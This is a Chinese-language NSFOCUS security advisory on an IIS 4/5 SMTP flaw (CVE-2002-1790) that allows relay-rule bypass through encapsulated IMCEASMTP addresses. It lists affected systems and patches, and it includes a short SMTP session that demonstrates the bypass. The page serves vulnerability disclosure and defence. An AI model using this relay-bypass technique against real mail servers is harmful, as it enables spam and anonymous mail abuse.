首页 -> 安全研究

安全研究

安全漏洞
Microsoft IIS SMTP服务封装SMTP地址漏洞

发布日期:2002-07-12
更新日期:2002-07-19

受影响系统:
Microsoft Exchange Server 5.5
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP2
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft IIS 4.0
    - Microsoft Windows NT 4.0
Microsoft IIS 5.0
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
描述:
BUGTRAQ  ID: 5213
CVE(CAN) ID: CVE-2002-1790

Microsoft IIS SMTP是一款用于发送邮件的SMTP服务器。

Microsoft IIS SMTP存在封装SMTP地址漏洞,远程攻击者可以利用这个漏洞绕过RELAY规则,发送邮件。

IIS 4和5包含的SMTP服务存在与Microsoft Security Bulletin MS99-027 相同的漏洞,攻击者可以使用封装SMTP地址来发送邮件到任意用户,利用这个漏洞,攻击者可以绕过SMTP服务中配置的RELAY规则,执行滥用邮件资源和发送匿名邮件等操作。

Microsoft Security Bulletin MS99-027描述的漏洞当时只针对Microsoft Exchange Server 5.5,现在发现IIS 4和5包含的SMTP服务也同样存在此漏洞。

<*来源:JWC (JWC@portcullis-security.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0131.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

JWC (JWC@portcullis-security.com)提供了如下测试方法:

220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready
at
Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: test@test.com
250 2.1.0 test@test.com....Sender OK
RCPT TO: test2@test.com
550 5.7.1 Unable to relay for test@test.com
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时没有合适的临时解决方法。

厂商补丁:

Microsoft
---------
微软当时提供的补丁只针对Microsoft Exchange Server 5.5,还没有针对IIS 4和5包含的SMTP服务提供补丁程序。

针对Microsoft Exchange Server 5.5服务的补丁如下,注意先安装service pack然后安装补丁程序:

Microsoft IIS 4.0:
Microsoft IIS 5.0:
Microsoft Exchange Server 5.5 SP2:

Microsoft Patch psp2imca.zip
ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imca.zip

Microsoft Patch psp2imci.zip
ftp://ftp.microsoft.com/bussys/exchange/exchange-public/fixes/Eng/Exchg5.5/PostSP2/imc-fix/psp2imci.zip

浏览次数:3803
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障